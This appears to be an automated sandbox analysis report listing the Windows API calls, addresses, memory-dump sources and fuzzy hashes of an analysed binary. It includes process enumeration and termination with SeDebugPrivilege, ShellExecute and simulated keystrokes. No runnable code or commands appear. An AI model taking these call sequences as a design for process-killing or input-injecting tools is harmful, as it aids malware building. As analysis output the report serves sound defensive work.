                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2402799130-0
                                                                                                                                                                  • Opcode ID: 481b2462963be482efe132bd2a8d01ca2a40e1d5682ead6fc0fc79f4f7b90269
                                                                                                                                                                  • Instruction ID: 42f8465200d3d64b8052f21d83c4205a587344b9ea49259fcc2e7c3f40fa5825
                                                                                                                                                                  • Opcode Fuzzy Hash: 481b2462963be482efe132bd2a8d01ca2a40e1d5682ead6fc0fc79f4f7b90269
                                                                                                                                                                  • Instruction Fuzzy Hash: 6461FE3451470ACFEB299F25E88CB35B7F5FF46326F114129E68686570CBB4A8A4CB40
                                                                                                                                                                  APIs
                                                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0024B204
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InvalidateRect
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 634782764-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0025E9EA
                                                                                                                                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0025EA0B
                                                                                                                                                                  • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0025EA20
                                                                                                                                                                  • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0025EA3D
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0025EA64
                                                                                                                                                                  • DestroyCursor.USER32(00000000), ref: 0025EA6F
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0025EA8C
                                                                                                                                                                  • DestroyCursor.USER32(00000000), ref: 0025EA97
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CursorDestroyExtractIconImageLoadMessageSend
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3992029641-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0025E9A0,00000004,00000000,00000000), ref: 001FF737
                                                                                                                                                                  • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0025E9A0,00000004,00000000,00000000), ref: 001FF77E
                                                                                                                                                                  • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0025E9A0,00000004,00000000,00000000), ref: 0025EB55
                                                                                                                                                                  • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0025E9A0,00000004,00000000,00000000), ref: 0025EBC1
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ShowWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1268545403-0
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0021E138: GetWindowThreadProcessId.USER32(?,00000000), ref: 0021E158
                                                                                                                                                                    • Part of subcall function 0021E138: GetCurrentThreadId.KERNEL32 ref: 0021E15F
                                                                                                                                                                    • Part of subcall function 0021E138: AttachThreadInput.USER32(00000000,?,0021CDFB,?,00000001), ref: 0021E166
                                                                                                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 0021CE06
                                                                                                                                                                  • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 0021CE23
                                                                                                                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 0021CE26
                                                                                                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 0021CE2F
                                                                                                                                                                  • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 0021CE4D
                                                                                                                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0021CE50
                                                                                                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 0021CE59
                                                                                                                                                                  • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 0021CE70
                                                                                                                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0021CE73
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2014098862-0
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0021A857: CLSIDFromProgID.COMBASE ref: 0021A874
                                                                                                                                                                    • Part of subcall function 0021A857: ProgIDFromCLSID.COMBASE(?,00000000), ref: 0021A88F
                                                                                                                                                                    • Part of subcall function 0021A857: lstrcmpiW.KERNEL32(?,00000000), ref: 0021A89D
                                                                                                                                                                    • Part of subcall function 0021A857: CoTaskMemFree.COMBASE(00000000), ref: 0021A8AD
                                                                                                                                                                  • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0023C6AD
                                                                                                                                                                  • _memset.LIBCMT ref: 0023C6BA
                                                                                                                                                                  • _memset.LIBCMT ref: 0023C7D8
                                                                                                                                                                  • CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,00000001), ref: 0023C804
                                                                                                                                                                  • CoTaskMemFree.COMBASE(?), ref: 0023C80F
                                                                                                                                                                  Strings
                                                                                                                                                                  • NULL Pointer assignment, xrefs: 0023C85D
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                                                                  • String ID: NULL Pointer assignment
                                                                                                                                                                  • API String ID: 1300414916-2785691316
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00241B09
                                                                                                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00241B17
                                                                                                                                                                  • __wsplitpath.LIBCMT ref: 00241B45
                                                                                                                                                                    • Part of subcall function 0020297D: __wsplitpath_helper.LIBCMT ref: 002029BD
                                                                                                                                                                  • _wcscat.LIBCMT ref: 00241B5A
                                                                                                                                                                  • Process32NextW.KERNEL32(00000000,?), ref: 00241BD0
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00241BE2
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                                                                  • String ID: hE)
                                                                                                                                                                  • API String ID: 1380811348-1983471782
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00249926
                                                                                                                                                                  • SendMessageW.USER32(?,00001036,00000000,?), ref: 0024993A
                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00249954
                                                                                                                                                                  • _wcscat.LIBCMT ref: 002499AF
                                                                                                                                                                  • SendMessageW.USER32(?,00001057,00000000,?), ref: 002499C6
                                                                                                                                                                  • SendMessageW.USER32(?,00001061,?,0000000F), ref: 002499F4
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$Window_wcscat
                                                                                                                                                                  • String ID: SysListView32
                                                                                                                                                                  • API String ID: 307300125-78025650
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00226F5B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00226F7D
                                                                                                                                                                    • Part of subcall function 00226F5B: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00226F8D
                                                                                                                                                                    • Part of subcall function 00226F5B: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00227022
                                                                                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0024168B
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0024169E
                                                                                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 002416CA
                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00241746
                                                                                                                                                                  • GetLastError.KERNEL32(00000000), ref: 00241751
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00241786
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                                  • String ID: SeDebugPrivilege
                                                                                                                                                                  • API String ID: 2533919879-2896544425
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadIconW.USER32(00000000,00007F03), ref: 002262D6
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: IconLoad
                                                                                                                                                                  • String ID: blank$info$question$stop$warning
                                                                                                                                                                  • API String ID: 2457776203-404129466
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000100,00000000), ref: 00227595
                                                                                                                                                                  • LoadStringW.USER32(00000000), ref: 0022759C
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 002275B2
                                                                                                                                                                  • LoadStringW.USER32(00000000), ref: 002275B9
                                                                                                                                                                  • _wprintf.LIBCMT ref: 002275DF
                                                                                                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 002275FD
                                                                                                                                                                  Strings
                                                                                                                                                                  • %s (%d) : ==> %s: %s %s, xrefs: 002275DA
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                                                                  • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                  • API String ID: 3648134473-3128320259
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$_memmovehtonsinet_ntoaselect
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1718709218-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • __mtinitlocknum.LIBCMT ref: 0020B744
                                                                                                                                                                    • Part of subcall function 00208A0C: __FF_MSGBANNER.LIBCMT ref: 00208A21
                                                                                                                                                                    • Part of subcall function 00208A0C: __NMSG_WRITE.LIBCMT ref: 00208A28
                                                                                                                                                                    • Part of subcall function 00208A0C: __malloc_crt.LIBCMT ref: 00208A48
                                                                                                                                                                  • __lock.LIBCMT ref: 0020B757
                                                                                                                                                                  • __lock.LIBCMT ref: 0020B7A3
                                                                                                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00296948,00000018,00216C2B,?,00000000,00000109), ref: 0020B7BF
                                                                                                                                                                  • RtlEnterCriticalSection.NTDLL(8000000C), ref: 0020B7DC
                                                                                                                                                                  • RtlLeaveCriticalSection.NTDLL(8000000C), ref: 0020B7EC
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1422805418-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 0022A1CE
                                                                                                                                                                    • Part of subcall function 0020010A: std::exception::exception.LIBCMT ref: 0020013E
                                                                                                                                                                    • Part of subcall function 0020010A: __CxxThrowException@8.LIBCMT ref: 00200153
                                                                                                                                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 0022A205
                                                                                                                                                                  • RtlEnterCriticalSection.NTDLL(?), ref: 0022A221
                                                                                                                                                                  • _memmove.LIBCMT ref: 0022A26F
                                                                                                                                                                  • _memmove.LIBCMT ref: 0022A28C
                                                                                                                                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 0022A29B
                                                                                                                                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 0022A2B0
                                                                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 0022A2CF
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 256516436-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00248CF3
                                                                                                                                                                  • GetDC.USER32(00000000), ref: 00248CFB
                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00248D06
                                                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00248D12
                                                                                                                                                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00248D4E
                                                                                                                                                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00248D5F
                                                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0024BB29,?,?,000000FF,00000000,?,000000FF,?), ref: 00248D99
                                                                                                                                                                  • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00248DB9
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3864802216-0
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0022C6A0: __time64.LIBCMT ref: 0022C6AA
                                                                                                                                                                    • Part of subcall function 001E41A7: _fseek.LIBCMT ref: 001E41BF
                                                                                                                                                                  • __wsplitpath.LIBCMT ref: 0022C96F
                                                                                                                                                                    • Part of subcall function 0020297D: __wsplitpath_helper.LIBCMT ref: 002029BD
                                                                                                                                                                  • _wcscpy.LIBCMT ref: 0022C982
                                                                                                                                                                  • _wcscat.LIBCMT ref: 0022C995
                                                                                                                                                                  • __wsplitpath.LIBCMT ref: 0022C9BA
                                                                                                                                                                  • _wcscat.LIBCMT ref: 0022C9D0
                                                                                                                                                                  • _wcscat.LIBCMT ref: 0022C9E3
                                                                                                                                                                    • Part of subcall function 0022C6E4: _memmove.LIBCMT ref: 0022C71D
                                                                                                                                                                    • Part of subcall function 0022C6E4: _memmove.LIBCMT ref: 0022C72C
                                                                                                                                                                  • _wcscmp.LIBCMT ref: 0022C92A
                                                                                                                                                                    • Part of subcall function 0022CE59: _wcscmp.LIBCMT ref: 0022CF49
                                                                                                                                                                    • Part of subcall function 0022CE59: _wcscmp.LIBCMT ref: 0022CF5C
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _wcscat_wcscmp$__wsplitpath_memmove$__time64__wsplitpath_helper_fseek_wcscpy
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1017551523-0
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001E84A6: __swprintf.LIBCMT ref: 001E84E5
                                                                                                                                                                    • Part of subcall function 001E84A6: __itow.LIBCMT ref: 001E8519
                                                                                                                                                                    • Part of subcall function 001E3BCF: _wcscpy.LIBCMT ref: 001E3BF2
                                                                                                                                                                  • _wcstok.LIBCMT ref: 00231D6E
                                                                                                                                                                  • _wcscpy.LIBCMT ref: 00231DFD
                                                                                                                                                                  • _memset.LIBCMT ref: 00231E30
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                                                                  • String ID: X$t:)p:)
                                                                                                                                                                  • API String ID: 774024439-1306594196
                                                                                                                                                                  • Opcode ID: c796c94bdd4bb7e384ca4d289588fbf2efe78229651453d1f5139065bfdd4d8f
                                                                                                                                                                  • Instruction ID: 264e3485427f45f02261a6820d3883684e1fbbae2195d6e66e715d37eefa74af
                                                                                                                                                                  • Opcode Fuzzy Hash: c796c94bdd4bb7e384ca4d289588fbf2efe78229651453d1f5139065bfdd4d8f
                                                                                                                                                                  • Instruction Fuzzy Hash: 56C1B0716187419FC714EF24C891A6EB7E4FF95310F00492DF89A972A2EB70ED25CB92
                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 0024214B
                                                                                                                                                                  • _memset.LIBCMT ref: 00242214
                                                                                                                                                                  • ShellExecuteExW.SHELL32(?), ref: 00242259
                                                                                                                                                                    • Part of subcall function 001E84A6: __swprintf.LIBCMT ref: 001E84E5
                                                                                                                                                                    • Part of subcall function 001E84A6: __itow.LIBCMT ref: 001E8519
                                                                                                                                                                    • Part of subcall function 001E3BCF: _wcscpy.LIBCMT ref: 001E3BF2
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00242320
                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 0024232F
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                                                                                                                  • String ID: @
                                                                                                                                                                  • API String ID: 4082843840-2766056989
                                                                                                                                                                  • Opcode ID: 5e1ed0f991edd7e9a6cf0599880a51554a6ecb1be8385665ea04344d28510d8d
                                                                                                                                                                  • Instruction ID: 26c016616a0d7c67f71bd4e2c229e9c15f815dc160ac70d2b26027c5b5b08d6b
                                                                                                                                                                  • Opcode Fuzzy Hash: 5e1ed0f991edd7e9a6cf0599880a51554a6ecb1be8385665ea04344d28510d8d
                                                                                                                                                                  • Instruction Fuzzy Hash: 15717E71A10619DFCB04DFA5C985AAEBBF5FF48310F108059E85AAB391DB70AD54CB90
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetParent.USER32(?), ref: 0022481D
                                                                                                                                                                  • GetKeyboardState.USER32(?), ref: 00224832
                                                                                                                                                                  • SetKeyboardState.USER32(?), ref: 00224893
                                                                                                                                                                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 002248C1
                                                                                                                                                                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 002248E0
                                                                                                                                                                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 00224926
                                                                                                                                                                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00224949
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 87235514-0
                                                                                                                                                                  • Opcode ID: 72f453844ffca95cbfe4a4226c20c9890a8bca6b26f1cf5169696a5a99fbae61
                                                                                                                                                                  • Instruction ID: 7d53634dc84cfa6d314487eeec4c02f95cdaec527acfcdfc9fbcbf1d04143166
                                                                                                                                                                  • Opcode Fuzzy Hash: 72f453844ffca95cbfe4a4226c20c9890a8bca6b26f1cf5169696a5a99fbae61
                                                                                                                                                                  • Instruction Fuzzy Hash: D65106A0A347E63DFB366BB4DC05BBB7E995B06304F088589E1D5468C2C2D8ECE4DB51
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetParent.USER32(00000000), ref: 00224638
                                                                                                                                                                  • GetKeyboardState.USER32(?), ref: 0022464D
                                                                                                                                                                  • SetKeyboardState.USER32(?), ref: 002246AE
                                                                                                                                                                  • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 002246DA
                                                                                                                                                                  • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 002246F7
                                                                                                                                                                  • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0022473B
                                                                                                                                                                  • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0022475C
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 87235514-0
                                                                                                                                                                  • Opcode ID: ec63b8496e53baf3a3773c34b9f4d06a26465996df8a48b738fb740897d2439d
                                                                                                                                                                  • Instruction ID: 392afcfb4061b47678ff5ca97c88b9ac768477b2ef9917f405b4ab292bf6fd16
                                                                                                                                                                  • Opcode Fuzzy Hash: ec63b8496e53baf3a3773c34b9f4d06a26465996df8a48b738fb740897d2439d
                                                                                                                                                                  • Instruction Fuzzy Hash: 78510BA09247E73DFB36ABA49C45B76BF995B07304F084489F1E54A8C2D3D4ECA4DB50
                                                                                                                                                                  APIs
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _wcsncpy$LocalTime
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2945705084-0
                                                                                                                                                                  • Opcode ID: f65ae383305b47a7874c0f737de911fc6c67e78cbe775cc479d22224d364bd76
                                                                                                                                                                  • Instruction ID: 21b059595dfac41bfbe0eb9a45a66cf6d58c4262815cc0234a520c6db848cc7c
                                                                                                                                                                  • Opcode Fuzzy Hash: f65ae383305b47a7874c0f737de911fc6c67e78cbe775cc479d22224d364bd76
                                                                                                                                                                  • Instruction Fuzzy Hash: 4C417765C31324B6DB10EBF4C88AACFB7AC9F05310F508467E915F3162EA70E6748BA5
                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 00249DB0
                                                                                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00249E57
                                                                                                                                                                  • IsMenu.USER32(?), ref: 00249E6F
                                                                                                                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00249EB7
                                                                                                                                                                  • DrawMenuBar.USER32 ref: 00249ED0
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                                                                                                  • String ID: 0
                                                                                                                                                                  • API String ID: 3866635326-4108050209
                                                                                                                                                                  • Opcode ID: 569325db9e2cccaeb6d70859ca124932c92b20770cf1a2e0f194ae4a5d8d990d
                                                                                                                                                                  • Instruction ID: 4759559b34236e43beb5c86643d237c91680d82b4455e80b51ca0e2b20151dce
                                                                                                                                                                  • Opcode Fuzzy Hash: 569325db9e2cccaeb6d70859ca124932c92b20770cf1a2e0f194ae4a5d8d990d
                                                                                                                                                                  • Instruction Fuzzy Hash: DE413875A1020AEFDB24DF64E884E9ABBF4FF09354F04812AE90597250D770EDA0DB50
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00248DF4
                                                                                                                                                                  • GetWindowLongW.USER32(00DA7820,000000F0), ref: 00248E27
                                                                                                                                                                  • GetWindowLongW.USER32(00DA7820,000000F0), ref: 00248E5C
                                                                                                                                                                  • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00248E8E
                                                                                                                                                                  • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00248EB8
                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00248EC9
                                                                                                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00248EE3
                                                                                                                                                                  Memory Dump Source
